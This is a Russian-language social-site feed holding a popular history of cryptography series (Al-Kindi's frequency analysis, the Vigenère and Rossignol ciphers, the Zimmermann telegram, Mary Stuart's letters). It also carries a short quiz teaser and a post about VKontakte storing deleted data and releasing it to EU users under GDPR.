Антуан и Бонавентур Россиньоли – выдающиеся французские криптографы, служившие Людовику XIII и Людовику XIV, и авторы «Великого шифра» – одного из самых сложных для дешифровки и криптоанализа шифра, со множеством "ловушек". «Великий шифр» использовался исключительно для передачи самых секретных сообщений, планов, замыслов и многих других политических деталей.


К сожалению, после смерти авторов, такой шифр перестал использоваться, так как все сведения для расшифровки были утеряны, но его надёжность и стойкость смогла противостоять усилиям всех криптографов и криптоаналитиков ещё два столетия. За основу шифра Антуан и Бонавентур взяли омофонический шифр, но вместо 10-20 вариантов, Россиньоли использовали тысячи чисел, многие из которых были "ловушками" или пустышками. Только 587 чисел были уникальными и несли какую-либо информацию.


Однако абсолютная устойчивость не могла сохраняться долгое время, и уже в конце XIX века, выдающемуся французскому криптографу Этьену Базери за три года удалось взломать и прочесть содержимое «Великого шифра». Кроме этого, ему удалось узнать реальную историю человека в железной маске, настолько скрытую тайну, которая завораживала многих людей и вдохновляла поэтов, таких как Гюго и Дюма. И легенда, к которой было снято множество фильмов.

Источник

Показать полностью 6

История криптографии: от стеганографии до сложных алгоритмов. Часть 2

История криптографии: от стеганографии до сложных алгоритмов. Часть 2 Шифр, Криптография, Длиннопост

Укрепление шифра

Из прошлой части мы знаем, что шифр простой замены (моноалфавитный) очень ненадёжен, так как при его криптоанализе несложно найти самые частовстречающиеся буквы и вернуть сообщение в исходного состояние. Это привело к тому, что после нахождения такой уязвимости люди ещё долгое время не смогли найти достойную альтернативу такому шифру. Впоследствии различные математики вместо создания нового шифра начали укреплять старый. Делали они несколькими способами:


Совершать ошибки. Самый простой вариант укрепления шифра – написать его содержимое неправильно, тогда его анализ усложняется в зависимости от степени ошибочного написания слов;

Использовать пустые знаки. Заменить каждую букву алфавита на случайные числа от 1 до 99. При таком способе 66 (73 при латинском алфавите ) из 99 чисел являются пустыми и не несут в себе никакого смысла. В зашифрованном тексте такие "пустышки" могут находиться в любых местах и при этом не искажают информацию сообщения;

Использовать кодовые символы. Суть метода заключается в присвоении какому-либо символу определённого значения (слово).

Пример использования кодовых символов:

История криптографии: от стеганографии до сложных алгоритмов. Часть 2 Шифр, Криптография, Длиннопост

Серьёзный прорыв в криптографии

История криптографии: от стеганографии до сложных алгоритмов. Часть 2 Шифр, Криптография, Длиннопост

Очень значимым прорывом в криптографии после Аль-Кинди сделал итальянский учёный – Леон Баттиста Альберти. В своей работе «Трактат о шифрах» он ввёл определение полиалфавитного шифра, на основе которого другие учёные создавали свои шифры. Основная идея полиалфавитного шифра – это использование нескольких шифров простой замены поочерёдно. Для примера возьмём слово «Информация» и два произвольных шифра. Представим для начала в виде картинки для большего понимания происходящего:

История криптографии: от стеганографии до сложных алгоритмов. Часть 2 Шифр, Криптография, Длиннопост

Для наглядности два полученных новых алфавита были отмечены разными цветами для демонстрации их использования в конечном результате. Для шифрования мы будем использовать попеременно каждый шифр (т.е. 1 символ - 1 шифр, 2 символ - 2 шифр, 3 символ - 1 шифр и т.д.). Для первой буквы "И" используем первый шифр, для "Н" - второй, "Ф" - первый, "О" - второй и т.д.

История криптографии: от стеганографии до сложных алгоритмов. Часть 2 Шифр, Криптография, Длиннопост

Итак, из слова «Информация» мы получили:


ОЩЖЗЫЯДФОГ


Используя способ, который только что был показан, можно намного усложнить задачу криптоаналитикам в дешифровке таких сообщений. Чем больше используется таких уникальных шифров в тексте, тем более сложным в разгадке он становится. В идеале можно достичь абсолютной устойчивости, если количество символов будет совпадать с количеством шифров. То есть на 100/1000/5000 символов текста будет 100/1000/5000 уникальных шифров, но к сожалению, добиться такого результата достаточно сложно, особенно в длинных письмах.


Самое устойчивое то сообщение, где для шифрования каждого символа использовался уникальный шифр.

Шифр Виженера

История криптографии: от стеганографии до сложных алгоритмов. Часть 2 Шифр, Криптография, Длиннопост

Хотя значительный вклад в создание нового шифра внесли такие математики как Альберти, Тритемий, но он более известен как шифр Виженера, так как именно этот учёный довёл идею до конечного вида. Стойкость шифра Виженера состоит в том, что для зашифровывания сообщения в нем используются не один, а 26 различных шифроалфавитов. Более детально шифр будет разобран в следующей части.


История проигнорировала важный факт и назвала шифр именем Виженера, несмотря на то, что он ничего не сделал для его создания.

Исторический пример

История криптографии: от стеганографии до сложных алгоритмов. Часть 2 Шифр, Криптография, Длиннопост

Во время Первой мировой войны, в 1917 году, перехват и дешифровка такой значимой телеграммы сыграли важную роль в дальнейшем развитии войны. В то же время в планы Германии не входило участие США в войне на стороне Антанты.


Немецкое командование желало также прекратить поставки американского оружия и снаряжения в Европу, считая, что это поможет окончательно задушить блокадой Англию и переломить ход войны в свою пользу. Для этого Артур Циммерман – министр иностранных дел Германии —решил составить план и отправить на рассмотрение Мексике, однако сообщение было перехвачено и дешифровано британской разведкой, позже передано президенту США – Вудро Вильсону. После ознакомления с содержанием телеграммы президенту не оставалось выбора, и 6 апреля 1917 года Америка объявляет войну Германии.


В телеграмме Циммермана Германия предлагала финансовую поддержку Мексике, если та начнёт наступление на Америку. Планировалось, что США будут заняты в этот момент войной с соседом и не будут ввязываться в войну в Европе, и в случае успеха Мексики, та получила бы утраченные ею территории.


Расшифровка этой телеграммы является одной из важнейших расшифровок в истории, которая значительно изменила дальнейший ход войны.

Источник

Показать полностью 6

История криптографии: от стеганографии до сложных алгоритмов. Часть 1

Современное шифрование применяется практически во всех отраслях и ежеминутно нас окружает: в банковских транзакциях, при обмене сообщениями, отправке писем, во многих мессенджарах и интернет-протоколах. И в этой серии статей, посвящённой истории криптографии будет рассмотрен её прогресс от примитивных задумок до сложных установок вроде Энигмы или Лоренца.

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

С чего всё начиналось?

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

С момента появления письменности для человечества появилась новая задача – защитить любым образом её содержимое от посторонних людей и нежеланных лиц. За долгую историю криптографии было создано, улучшено и взломано большое количество разнообразных и очень хитрых шифров. Из-за неустойчивости некоторых из них было проиграно много битв и даже войн.


Для начала введём два термина, для полного понимания содержимого статьи:


Стеганография – наука, о способе тайной передачи сообщения, т.е. исходный текст остаётся неизменным, а прячется само письмо или его содержимое. (например письмо, написанное невидимыми чернилами).


В разных государствах практиковался разный метод сокрытия сообщения, например в древнем Китае практиковался такой метод:


Для начала писалось какое-либо сообщение на тонком куске шёлковой ткани, которая затем сворачивалась в крохотный шарик и покрывалась воском. После этот восковой шарик проглатывался и даже при тщательном досмотре было невозможным найти сообщение с текстом.


Другим, более современным вариантом вариантом использования стеганографии являются микроточки, – способ, которым пользовалась Германия во время Второй мировой войны. Микроточки – изображения, которые были уменьшены и сжаты до размеров типографской точки, которые приклеивались к письмам, а именно на место расположения обычных точек, были практически незаметными.

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

Криптография – наука о способе безопасного общения и обмена информации в присутствии третьих сторон.


Криптоанализ - наука о методах расшифровки зашифрованной информации без предназначенного для такой расшифровки ключа.


Примитивные варианты

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

Симметричное шифрование – способ шифрования, где для шифрования и расшифровывания какой-либо информации используется один и тот же ключ. Был незаменимым типом шифрования информации до прихода асимметричного, в 70-х годах XX века.


Все шифры до середины XX века назывались симметричными и были незаменимы (до компьютеризации).


Самым примитивным и простым способом шифрования, с использованием симметричного шифра — это таблица со столбцами.


Пример такого способа (читать сверху вниз):

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

После занесения текста в таблицу мы получаем сообщение такого содержания:


КДВЕАПЕОУАРЁРТДР ЕТИ! ОПД В


Для его расшифровки нам надо знать лишь число столбцов, в нашем случае это число 7. Конечно, такой способ очень легко взломать самым простым перебором вариантов. Поэтому этот метод долго не продержался и люди начали улучшать его разными способами, например вместо количества столбцов стали использовать слова и менять каждую букву в слове относительно буквы ключа – и этот способ назвали полиалфавитным шифром, в часности шифром Виженера (который, к слову был ошибочно приписан ему, в действительности им пользовались задолго до Виженера).

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

Индекс возле каждой буквы — номер её расположения в алфавите. Для получения шифротекста нам необходимо сложить номер буквы ключа с номером буквы текста. Например буква получилась в результате "Ф" – 16+6=22, "Д" – 5+13=18, так как в алфавите 33 буквы, то при превышении этого числа следует начинать с начала. "Г" – 12+25-33=4.

Взлом (криптоанализ) простых шифров

Почти всё первое тысячелетие использовался только шифр простой замены букв. Он считался "невзламываемым", ведь считалось, что он имеет миллиарды и миллиарды возможных значений для каждой буквы. Однако, арабский математик Аль-Кинди в IX веке смог найти достаточно простое и очень эффективное решение. Аль-Кинди в своих трудах описал способ дешифровки:


Один из способов прочесть зашифрованное сообщение, если мы знаем язык, на котором оно написано, — это взять другой незашифрованный текст на том же языке, размером на страницу или около того, и затем подсчитать появление в нем каждой из букв. Назовем наиболее частовстречающуюся букву «первой», букву, которая по частоте появления стоит на втором месте, назовем «вторая», букву, которая по частоте появления стоит на третьем месте, назовем «третья» и так далее, пока не будут сочтены все различные буквы в незашифрованном тексте.


Затем посмотрим на зашифрованный текст, который мы хотим прочитать,и таким же способом проведем сортировку его символов. Найдем наиболее часто встречающийся символ и заменим его «первой» буквой незашифрованного текста, второй по частоте появления символ заменим «второй» буквой^ третий по частоте появления символ заменим«третьей» буквой и так далее, пока не будут заменены все символы зашифрованного сообщения, которое мы хотим дешифровать.

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

Это было настоящим прорывом в области криптоанализа за время его существования. Люди не сразу смогли придумать замену такому устоявшемуся методу.


Как видно из способа Аль-Кинди, то основным методом взлома простых шифров является частотный анализ. Он представляет собой изучение частоты букв или групп букв в зашифрованном тексте. Например самой частоиспользуемой буквой в русском языке является "О", после "Е" и "А". Помимо поиска отдельных букв можно искать сразу их сочетание между собой:


"ТЬ", "АТ", "СТ", "ЫЙ"


Это самые распространённые сочетания букв, в больших объёмах текста такое правило будет работать и при простом шифровании выявить закономерность очень просто (с маленькими предложениями или небольшой группой слов будет сложнее).


Все шифры, которые используют метод простой замены букв – называются моноалфитными шифрами и именно они легли в основу полиалфавитного способа.


Пример частоты использования букв и их расположения в слове:

История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост
История криптографии: от стеганографии до сложных алгоритмов. Часть 1 Шифр, Криптография, Длиннопост

Исторический пример

В конце XVI века, королева Шотландии – Мария Стюарт всё ещё оставалась претенденткой на английский престол. После неудачи и бегства с Шотландии, Мария планировала сместить с престола королеву Елизавету I. Мария Стюарт вела тайную переписку с Энтони Бабингтоном, где обсуждался план убийства королевы и освобождения из заключения. Хоть Мария и шифровала свои сообщения моноалфавитным шифром (невзламываемым на тот момент), все её сообщения были успешно дешифрованы и переданы в руки английской королевы. После обнародования её сообщений она предстала перед судом и была приговорена к смертной казни.

Источник

Показать полностью 8

Угадайте звездного капитана юмористической команды «Сборная Красноярска» по описанию одного из участников

Ну что, потренировались? А теперь пора браться за дело всерьез.

Показать полностью

«ВКонтакте» хранит удалённые публикации, файлы и сообщения. Как получить их?

Житель польского города Сопот Кристиан Шинкевич запросил у соцсети «ВКонтакте» все сведения, которые она обязана предоставлять в рамках европейского регламента о персональных данных. Объём выданной информации его удивил.


Шинкевич получил файл, в котором содержатся следующие сведения:


1. История изменения имени и фамилии на странице.

2. Список групп, в которых он состоит или состоял администратором или модератором.

3. Переписка за всё время существования аккаунта, в том числе из удалённых диалогов.

4. Прямые ссылки на файлы из диалогов и голосовые сообщения из переписки, в том числе удалённые. Указаны IP-адреса, с которых загружались эти файлы и время загрузки.

5. Прямые ссылки на фотографии из открытых и закрытых альбомов, открывающиеся без залогинивания в VK.

6. История привязки и отвязки телефонных номеров.

7. История восстановления паролей.

8. Все комментарии и публикации со стены, в том числе удалённые.


https://www.facebook.com/kris.minsk/posts/480428622415608

Все эти сведения «ВКонтакте» предоставляет лишь жителям стран Евросоюза. В России нет норм, которые обязывали бы соцсеть выдавать пользователям собранные данные, поэтому соцсеть откажет, если вы их запросите.

https://twitter.com/ypypy28/status/1031241475890270208

«ВКонтакте» хранит удалённые публикации, файлы и сообщения. Как получить их? ВКонтакте, Данные, Хранение, Запросы, Служба поддержки, Евросоюз

https://www.iguides.ru/main/other/vkontakte_khranit_udalyenn...

Показать полностью 1
Отличная работа, все прочитано!